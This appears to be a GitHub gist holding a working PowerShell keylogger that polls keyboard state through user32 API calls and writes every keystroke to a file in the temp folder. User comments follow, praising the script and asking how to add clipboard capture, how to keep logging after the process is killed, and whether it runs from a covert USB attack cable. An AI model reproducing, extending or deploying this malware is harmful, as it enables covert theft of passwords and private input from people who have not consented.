Simple Windows Keylogger using PowerShell

gistfile1.txt

#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {
    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    while ($true) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
    }
  }
  finally
  {
    # open logger file in Notepad
    notepad $Path
  }
}

# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
Start-KeyLogger

Simple and effective! +1

I really thought that just by replacing CTRL+C to CTRL+"another letter" would work.
But its not. It does display the correct combination letter, since i replaced all CTRL+C to CTRL+"another letter".

Still it will stop only after using CTRL+C, but now i figured that CTRL+C will only work after using CTRL+"another letter". So at the end of the day that is good for me. Just adds a piece of mind that saving copying some text wont accidentaly stop logger.

Also i noticed that it logs CTRL presses as odd rectangular boxes in the log.
Any idea how to log contents from clipboard as well in the same log?

Easy to use without any downloads. Highly recommended! 👍 💯

can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt

Thanks

can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt

Thanks
(2)

I really thought that just by replacing CTRL+C to CTRL+"another letter" would work.
But its not. It does display the correct combination letter, since i replaced all CTRL+C to CTRL+"another letter".

Still it will stop only after using CTRL+C, but now i figured that CTRL+C will only work after using CTRL+"another letter". So at the end of the day that is good for me. Just adds a piece of mind that saving copying some text wont accidentaly stop logger.

Also i noticed that it logs CTRL presses as odd rectangular boxes in the log.
Any idea how to log contents from clipboard as well in the same log?

CTRL + C is ASCII Code 32767.

3 - ETX (end of text)
27 - is marked as ESC
67 - C

The CTRL key does not have its own ASCII code, however the code above works as CTRL + C.
https://www.quora.com/What-is-the-ASCII-code-for-the-CTRL-key

Does this work on a usb ninja cable

my antivirus prevented it from running:

Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent